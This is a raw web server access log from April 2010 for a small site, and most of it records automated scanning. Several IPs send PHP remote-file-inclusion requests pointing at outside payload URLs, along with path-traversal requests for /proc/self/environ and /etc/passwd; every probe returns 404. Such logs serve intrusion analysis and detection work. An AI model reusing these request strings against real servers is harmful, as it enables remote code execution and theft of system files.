190.152.145.54 - - [25/Apr/2010:05:57:49 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:57:54 -0500] "GET /playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:57:54 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:57:54 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.45.176.90 - - [25/Apr/2010:06:00:38 -0500] "GET /logs/access_log.1268265600//microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 332 "-""libwww-perl/5.833"
207.45.176.90 - - [25/Apr/2010:06:00:38 -0500] "GET //microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.833"
207.45.176.90 - - [25/Apr/2010:06:00:38 -0500] "GET /logs//microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.833"
66.249.71.36 - - [25/Apr/2010:06:03:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.71.36 - - [25/Apr/2010:06:03:26 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.1" 200 55068 "-""Googlebot-Image/1.0"
207.46.204.230 - - [25/Apr/2010:06:05:25 -0500] "GET /logs/access_log.1193961600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.251.189.205 - - [25/Apr/2010:06:08:17 -0500] "GET /logs/index.php?option=com_projectfork§ion=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:06:08:17 -0500] "GET /index.php?option=com_projectfork§ion=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:06:08:18 -0500] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:06:08:18 -0500] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:06:08:18 -0500] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:06:08:18 -0500] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:06:08:19 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:06:08:19 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.189.224.16 - - [25/Apr/2010:06:10:36 -0500] "GET //convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:36 -0500] "GET /logs//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:36 -0500] "GET /logs/access_log.1220054400//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:38 -0500] "GET //convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:38 -0500] "GET /logs//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:38 -0500] "GET /logs/access_log.1220054400//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:43 -0500] "GET //convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:43 -0500] "GET /logs//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:10:43 -0500] "GET /logs/access_log.1220054400//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:11:03 -0500] "GET /logs/access_log.1220054400%20%20//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:11:05 -0500] "GET /logs/access_log.1220054400//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:11:05 -0500] "GET //convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:11:05 -0500] "GET /logs//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:06:12:14 -0500] "GET /logs/access_log.1268611200%20%20//write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:06:12:14 -0500] "GET //write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:06:12:14 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:06:14:09 -0500] "GET /logs/access_log.1270684800%20%20//write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:32 -0500] "GET /logs/access_log.1271030400%20%20//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 392 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:32 -0500] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:32 -0500] "GET //zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:33 -0500] "GET //zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:33 -0500] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:33 -0500] "GET /logs/access_log.1271030400//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 390 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:36 -0500] "GET //zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:36 -0500] "GET /logs//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:14:36 -0500] "GET /logs/access_log.1271030400//zcaccomponents/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://77.92.94.85/id.txt?? HTTP/1.1" 404 390 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:17:52 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:17:52 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:17:52 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:18:19 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:18:19 -0500] "GET /logs/access_log.1219708800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:18:19 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:18:25 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:18:25 -0500] "GET /logs/access_log.1219708800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:18:25 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:19:11 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:19:16 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:19:16 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:06:19:25 -0500] "GET //write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:06:19:25 -0500] "GET /logs/access_log.1268611200//write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:06:19:25 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:19:54 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:19:54 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:19:54 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:20:18 -0500] "GET /logs/access_log.1266278400//ashnews.php?pathtoashnews=http://77.92.94.85/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:20:18 -0500] "GET /logs//ashnews.php?pathtoashnews=http://77.92.94.85/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:06:20:18 -0500] "GET //ashnews.php?pathtoashnews=http://77.92.94.85/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
216.75.13.231 - - [25/Apr/2010:06:21:57 -0500] "GET //write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:22:15 -0500] "GET /logs/access_log.1220054400%20%20//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.75.13.231 - - [25/Apr/2010:06:22:33 -0500] "GET /logs/access_log.1268611200//write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.75.13.231 - - [25/Apr/2010:06:22:33 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:23:30 -0500] "GET /logs/access_log.1220054400%20%20//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:23:36 -0500] "GET /logs/access_log.1220054400%20%20//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:15 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:15 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:15 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:31 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:31 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:31 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:39 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:39 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:39 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:45 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:45 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:24:45 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.13.101 - - [25/Apr/2010:06:24:55 -0500] "GET /logs/access_log.1239235200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.244.236.248 - - [25/Apr/2010:06:25:27 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:25:27 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:25:27 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:25:37 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:25:37 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:25:37 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:25:59 -0500] "GET /logs/access_log.1220054400//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:25:59 -0500] "GET //bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [25/Apr/2010:06:26:00 -0500] "GET /logs//bemarket/postscript/postscript.php?p_media=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:26:21 -0500] "GET /logs/access_log.1212969600%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:26:23 -0500] "GET /logs/access_log.1212969600%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
193.252.118.174 - - [25/Apr/2010:06:34:40 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
213.189.224.16 - - [25/Apr/2010:06:43:38 -0500] "GET /logs/access_log.1265068800//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:44:52 -0500] "GET /logs/access_log.1265068800//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:45:09 -0500] "GET /logs/access_log.1265068800//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.160.224.208 - - [25/Apr/2010:06:46:37 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
195.160.224.208 - - [25/Apr/2010:06:46:47 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
72.9.156.236 - - [25/Apr/2010:06:47:18 -0500] "GET //mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:47:18 -0500] "GET /logs//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:47:18 -0500] "GET //mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:47:18 -0500] "GET /logs//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:47:20 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:47:21 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:47:31 -0500] "GET /logs/access_log.1265068800//convert/mvcw.php?vwar_root=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:48:00 -0500] "GET /logs//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:48:03 -0500] "GET /logs/access_log.1225929600//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:48:03 -0500] "GET //mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:48:35 -0500] "GET //mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:48:35 -0500] "GET /logs//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:48:35 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:51:29 -0500] "GET //manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:51:29 -0500] "GET /logs//manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:51:29 -0500] "GET /logs/access_log.1263772800//manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:51:37 -0500] "GET /logs/access_log.1263772800//manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:51:37 -0500] "GET /logs//manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:06:51:37 -0500] "GET //manager/admin/u_ins.php?MGR=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:52:57 -0500] "GET //mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:52:57 -0500] "GET /logs//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:06:52:57 -0500] "GET /logs/access_log.1212969600%20%20//mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:53:01 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:53:01 -0500] "GET /logs/access_log.1237852800%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:06:53:01 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
194.150.248.85 - - [25/Apr/2010:06:53:08 -0500] "GET /logs//nullpo/hsList.php?subdir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 307 "-""libwww-perl/5.812"
194.150.248.85 - - [25/Apr/2010:06:53:08 -0500] "GET //nullpo/hsList.php?subdir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-""libwww-perl/5.812"
72.9.156.236 - - [25/Apr/2010:06:53:28 -0500] "GET //mcf.php?content=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
